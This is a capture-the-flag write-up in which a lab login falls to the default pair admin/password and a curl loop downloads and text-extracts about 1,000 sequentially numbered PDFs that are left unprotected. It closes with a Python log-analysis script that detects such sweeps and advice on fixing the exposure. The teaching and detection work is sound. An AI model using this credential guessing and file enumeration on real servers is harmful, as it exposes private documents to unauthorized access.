Secret Files (bronze, 50p)

You have found a webserver with login prompt at https://10.XX.32.95:1002. Try to find the flag.
Can you find login credentials and retrieve the flag that is hidden in one of the PDF files?


The webpage asks for credentials.

screenshot of website

Logging in with the simple credential pair admin/password works. The website then provides a list of ~1000 documents (the screenshot contains only two) to download.

screenshot of documents list

Look at the HTML source to find the link pattern and write a script that downloads the documents.

<center><h3>Welcome to top secret document storage</h3></center><br><br>
Do not share this confidential file without a permission: <a href="uploads/secret_document1.pdf"><img src="pdf.png" height=20>download file</a><br><hr><br>
Do not share this confidential file without a permission: <a href="uploads/secret_document2.pdf"><img src="pdf.png" height=20>download file</a><br><hr><br>

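Download all documents and convert them to text with pdftotext. The flag is revealed in secret_document222.pdf. Note that the loop below sends no credentials or session cookie, so the files under uploads/ are served without going through the login.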

$ for i in $(seq 1 1000); do echo -n "$i: "; curl -sk https://10.XX.32.95:1002/uploads/secret_document$i.pdf -o - | pdftotext  - - | xargs; done
1: 404 Flag not found.
2: 404 Flag not found.
3: 404 Flag not found.
220: 404 Flag not found.
221: 404 Flag not found.
222: 5a3120aef7d098ea27a3c5de177b2602
223: 404 Flag not found.
224: 404 Flag not found.
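
From the server side, the loop above appears in the access log as one client fetching consecutively numbered files under uploads/. The following is an added example, not part of the original write-up: a Python check that flags such sweeps. The combined log format, the sample lines, the client addresses and the min_run threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Matches the client address, the numeric id in the uploads/secret_documentN.pdf
# pattern shown in the HTML source, and the response status.
REQ = re.compile(r'^(\S+) .*"GET /uploads/secret_document(\d+)\.pdf HTTP/[\d.]+" (\d{3})')

def longest_run(ids):
    """Length of the longest run of consecutive integers in ids."""
    present, best = set(ids), 0
    for n in present:
        if n - 1 not in present:          # n starts a run
            length = 1
            while n + length in present:
                length += 1
            best = max(best, length)
    return best

def find_enumerators(lines, min_run=20):
    """Return {client: (distinct_docs, longest_run)} for clients whose
    successful requests cover at least min_run consecutive document numbers."""
    seen = defaultdict(set)
    for line in lines:
        m = REQ.match(line)
        if m and m.group(3) == "200":
            seen[m.group(1)].add(int(m.group(2)))
    report = {}
    for client, ids in seen.items():
        run = longest_run(ids)
        if run >= min_run:                # min_run is an assumed threshold
            report[client] = (len(ids), run)
    return report

def sample_log():
    """Constructed access-log lines (combined log format), not real server data."""
    fmt = ('{ip} - - [01/Jan/2024:10:{m:02d}:{s:02d} +0000] '
           '"GET /uploads/secret_document{n}.pdf HTTP/1.1" 200 1843 "-" "{ua}"')
    lines = [fmt.format(ip="192.0.2.10", m=n // 60, s=n % 60, n=n, ua="curl/8.5.0")
             for n in range(1, 301)]                      # sequential sweep
    lines += [fmt.format(ip="192.0.2.55", m=30, s=i, n=n, ua="Mozilla/5.0")
              for i, n in enumerate((17, 404, 222, 18))]  # ordinary browsing
    lines.append('192.0.2.55 - - [01/Jan/2024:10:31:00 +0000] '
                 '"GET /pdf.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    return lines

if __name__ == "__main__":
    for client, (docs, run) in find_enumerators(sample_log()).items():
        print(f"{client}: {docs} documents, longest consecutive run {run}")
```

Detection only tells you the sweep happened; the underlying fix is to serve the documents through a handler that checks the session instead of exposing them as static files with predictable names.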